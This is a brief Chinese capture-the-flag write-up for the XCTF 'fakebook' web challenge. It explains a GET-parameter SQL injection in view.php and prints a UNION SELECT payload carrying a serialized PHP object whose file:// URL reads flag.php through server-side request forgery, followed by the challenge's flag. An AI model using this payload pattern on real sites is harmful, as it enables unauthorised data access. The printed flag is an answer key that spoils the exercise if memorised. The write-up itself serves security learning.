攻防世界web进阶区之fakebook
首先,打开题目链接:点击join创造一个新用户,创建完成后如图所示:
我们会发现这个blank可以点开,
这里存在一个get注入
我们会发现/var/www/html/view.php 路径,
利用no参数进行注入,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。
Payload:?no=0//union//select 1,2,3,'O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}'查看页面源代码
点击所给的iframe标签,即可得到flag
flag{c1e552fdf77049fabf65168f22f7aeab}